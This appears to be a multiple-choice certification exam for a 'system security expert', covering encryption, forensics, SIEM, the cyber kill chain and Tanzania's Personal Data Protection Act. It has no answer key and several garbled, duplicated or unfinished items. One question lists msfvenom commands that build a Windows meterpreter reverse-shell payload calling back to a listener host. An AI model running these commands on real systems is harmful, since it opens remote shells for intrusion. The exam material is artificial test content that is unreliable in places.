DMI(System security
expert - 29/09/2025)
1.
Which of the following is used for encrypting data at the network level?
a. SMTP
b. S/MIME
c. HTTPS
d.
IPSec
2.
What technology could
Lauren's employer implement to help prevent
confidential data from being
emailed out of the organization?.
a.
UDP
b. IDS
c. A
Firewall
d. DLP
3.
Which act is started under Personal Data Protection Act.
a. To ensure
data accuracy
b. To make data processing faster
c. To enable data sharing
with third parties
d. To remove
identifying information to protect privacy
4.
What type of security issue
arises when an attacker can deduce a more sensitive piece of information by analyzing several pieces of information
classified at a lower level?.
a.
Inference
b. Multilevel security
c. Parameterization
d. SQL injection
5.
When should a SHA-256 hash check be performed when processing evidence?.
a.
Before and after
evidence examination
b. After the evidence examination has been completed
c. On an hourly basis during the evidence examination
d. Before the evidence examination has been completed
6.
What act gives the user right of accessing personal
data according to Personal Data Protection Commission of Tanzania.
a.
Right to data
portability
b. Right to
erasure
c. Right of
access
d. Right to restriction of processing
7.
Who is in charge of ensure that personal data are protected in an organization.
a. The marketing team
b. The Data Protection Officer
(DPO)
c. The IT department
d.
The CEO
8.
What is the characteristics of personal data.
a. Not subject
to data protection laws
b. Includes information like race, health,
and religious beliefs
c. Freely shareable without consent
d. Less protection required
9.
What is the role of Personal Data Protection Commission.
a. To promote
business growth
b. To safeguard personal data and privacy
c. To increase
government revenue
d. To facilitate data sharing
10.
What malware analysis
operation can the investigator perform
using the jv16
tool?
a. Installation Monitor
b. Registry
Analysis/Monitoring
c. Network Traffic Monitoring/Analysis
d. Files and Folder
Monitor
11.
Which technical mechanism
ensure that personal
data are protected.
a. Employee training
programs
b. Antivirus
software
c. Data encryption
d. Firewalls
12.
Who is responsible to fill user personal data policies, ........
a. User
b. Data owner
c. Data custodian
d. Auditor
13.
Which section of the assessment report addresses separate
vulnerabilities, weaknesses,
and gaps?
a.
Executive summary with full details
b. Key findings section
c. Risk review
section
d. Findings definition section
14.
When using Windows
acquisitions tools to acquire digital
evidence, it is important to use
a well-tested hardware write-blocking device to:
a.
Automate collection from image files
b. Avoiding copying
data from the boot partition
c. Acquire data from the host-protected area on a disk
d. Prevent contamination to the evidence
drive
15.
Key function of SEIM tools is.
a. To monitor
network traffic for signs of compromise and alert security
personnel to potential
threats
b.
To enforce security
policies and control
access to a network or system
c. To identify
vulnerabilities in a network or system by scanning for known security weaknesses
d.
To detect and block malicious
traffic
16.
Which is not true according to Personal Data Protection Act of tanzania.
a. Right to indefinite data retention
b. Right to
object
c. Right to restrict processing
d. Right to
rectification
17.
Which mechanism is used to protect personal
data in organization.
a. Employee training
b. Legal compliance audits
c. Data encryption
d. Privacy
policies
18.
What type of vulnerability scan accesses configuration information from the systems it is
run against as well as information that can be accessed via services available
via the network?.
a.
Web application scans
b. Port scans
c.
Authenticated scans
d. Unauthenticated scans
19.
Which method does email used to change message between
clients.
a. Simple Mail Transfer Protocol
(SMTP)
b. Post Office Protocol Version
3 (POP3)
c. Internet Message
Access Protocol (IMAP)
d. Messaging Application Programming Interface (MAPI)
20.
Which of the following techniques delete the files
permanently?
a. Steganography
b. Trail obfuscation
c. Artifact Wiping
d.
Data Hiding
21.
A command that list all loaded module
on the OS.
a. lsof -m
b. plist mod -a
c. lsmod
d. list modules
-a.
22.
What mode must be configured to allow a Network Interface Card (NIC) to capture all traffic on the wire?
a.
Extended mode
b. Monitor
mode
c. 10/100
d. Promiscuous mode
23.
What utility could be used to avoid sniffing of
traffic?
a. Proxify
b. Psiphon
c. Shark
d. SandroProxy
24.
What is the MOST common
security risk of a mobile
device?.
a. Data leakage
b. Data spoofing
c. Insecure communications link
d. Malware infection
25.
Which is the indicator of threat actor.
a. IP addresses
b. Hashes
c. Domain names
d. All of the choices
26.
What is the principle of accountability in data protection?.
a. Keeping personal
data for as long as
necessary
b. Minimizing the data collected
c. Ensuring data is encrypted
d. Demonstrating compliance with data protection laws
27.
Which is not example of personal data.
a. National ID number
b. Company name
c. Phone number
d.
IP address
28.
Which of the following tools is most likely to be used during discovery?
a. Nmap
b. Nessus
c. John
d. Nikto
29.
The key function
of incidence plan.
a. To detect
and remove malware
from a system
b. To block malicious websites
c. To outline
procedures for responding to and managing
cybersecurity incidents
d. To encrypt
sensitive data during
transmission
30.
What three types
of interfaces are typically tested
during software testing.
a. APIs, UIs, and physical
interfaces
b. Network, physical, and application interfaces
c. Application, programmatic, and user interfaces
d. Network interfaces, APIs, and UIs
31.
What security control
does MAC cloning
attempt to bypass
for wired networks?
a. Etherkiller
prevention
b. VLAN hopping
c. 802.1q trunking
d. Port security
32.
Which is true about Personal
Data Protection.
a. To identify
areas for improvement in the policies
b. To obtain
certification from the Personal Data Protection Commission
c. All options
are correct
d. To assess
the organizations compliance with data protection regulations
33.
Which of the following is a part of a Solid-State Drive
(SSD)?
a. Head
b. Cylinder
c. NAND-based flash memory
d. Spindle
34.
Which among the following is the best example of the third
step (delivery) in the cyber
kill chain?.
a.
An intruder creates
malware to be used as a malicious
attachment to an email.
b. An intruders
malware is installed
on a targets machine.
c. An intruders
malware is triggered
when a target opens a malicious email attachment.
d.
An intruder sends a malicious
attachment via email to a target.
35.
What type of attack is the creation
and exchange of state tokens
intended to prevent?.
a. XACML
b. XSS
c. SQL injection
d. CSRF
36.
Why would you need to find out the gateway
of a device when investigating a wireless attack?
a.
The gateway will be the IP used to manage the RADIUS
server
b. The gateway
will be the IP of the proxy
server used by the attacker
to launch the attack
c.
The gateway will be the IP of the attacker
computer
d. The gateway
will be the IP used to manage the access
point
37.
Which regulation requires
companies to appoint
a Data Protection Officer (DPO) if they process large amounts of personal
data?.
a.
EPOCA
b. The Personal
Data Protection Act,
2022
c. National Payment
Systems (NPS) Act 2015
d. Cyber Crime Act, 2015
38.
Which of the following tool enables data acquisition and duplication?
a. DriveSpy
b. Colasoft’s
Capsa
c. Wireshark
d.
Xplico
39.
What is the purpose of the data protection register
maintained by the Personal Data Protection Commission in Tanzania?
a.
To register all data controllers and data processors
b. All options
are correct
c. To facilitate the enforcement of data protection laws
d. To record
all data processing activities in the
country
40.
Which user information is not concerted.
a.
Freely given
b. Mandatory
c. Specific
d. Informed
41.
Which of the following is not correct?.
a. Web cache might reduce the response
time
b. Web cache doesn’t has its own disk space
c. Web cache can act both like server and
client
d. Web cache contains copies of recently
requested objects
42.
What is the term used to describe
a cybersecurity attack
that occurs simultaneously from multiple sources?
a.
Coordinated attack
b. Zero-day
attack
c. Spear
phishing
d. Brute-force attack
43.
Which is not the valid key size of AES.
a. 384 bits
b. 192 bits
c.
256 bits
d. 128 bits
44.
An example of personal data.
a. A
public holiday calendar
b. A list of cities
in Tanzania
c. A person’s home address
d. A company’s
revenue figures
45.
An attacker sends
more request to the route
making it not give access
to other users, what attack is performed here.
a.
Denial of service
b. Digital attack.
c. Physical attack
d. ARP redirect
46.
Which is the principle that started that data should be collected
only for specified, explicit and legitimate purposes .
a.
Data minimization
b. Purpose limitation
c.
Storage limitation
d. Accuracy
47.
What is the purpose of a security
token in authentication?
a.
To verify the identity of a user
b. To encrypt
sensitive data during
transmission
c. To block spam emails
d. To block spam emails
48.
Which system does SSL use to function?
a. DES
b. PKI
c. 3DES
d. AES
49.
The act of unauthorized access of personal
information and retrieval
is know as.
a. Data encryption
b. Data processing
c. Data breach
d. Data retention
50.
The role of Personal Data Protection Commission is.
a. To increase
data storage capacity
b.
To ensure compliance with financial regulations
c. To outline
how an organization will manage
and protect personal
data
d. To improve
marketing strategies
Others
1.
What is an advantage of RSA over the DSA?
a.
It can provide
digital signature and encryption functionality.
b.
It uses fewer
resources and encrypts
faster because it uses symmetric keys.
c.
It is
a block cipher rather than a stream cipher.
d.
It employs a one-time encryption pad.
2. What is the correct
way of using MSFvenom to generate a reverse TCP shellcode for Windows?
a. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
b. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
c. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444
-f exe > shell.exe
d. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe >
shell.exe
3.
What is the first step in conducting a Data Protection Impact Assessment (DPIA)?
a.
Identifying risks and provide mitigation
b.
Mapping the data flow
c.
Identifying the data processors
d.
Documenting the findings
4.
What does the term "pseudonymization" mean in data protection?
a.
Encrypting all data
b. Replacing original
identifiers with the fake identifiers c.
5.
What feature enables
code to be executed without
the usual security
checks?
a.
Temporal isolation
b.
Maintenance hook
c.
Race conditions
d.
Process multiplexing
6.
What is the correct order of execution
for security architecture?
a.
Governance, strategy and program management, operations, project delivery
b.
Governance, strategy and program management, project delivery, operations
c.
Strategy and program
management, project delivery, governance, operations
d.
Strategy and program
management, governance, project
delivery, operations
7.
8.
What does "data retention policy" refer
to?
9.
What is the "right to be forgotten"?
10. What does the right to data portability entail?
11. What is the purpose
of data anonymization?
12. What does the term "zero-day vulnerability" mean in cybersecurity?
13. What is the main focus of data protection impact assessments (DPIAs)?
14. What does "privacy by design" mean?
15. What is mean by data minimization.
16. What is the purpose
of the data protection audit
under the Tanzanian Data Protection Act?
17. What is the consequence of non-compliance with data protection regulations?
18. Which term describes the unauthorized access
and retrieval of data?
19. What is meant by "data breach"?
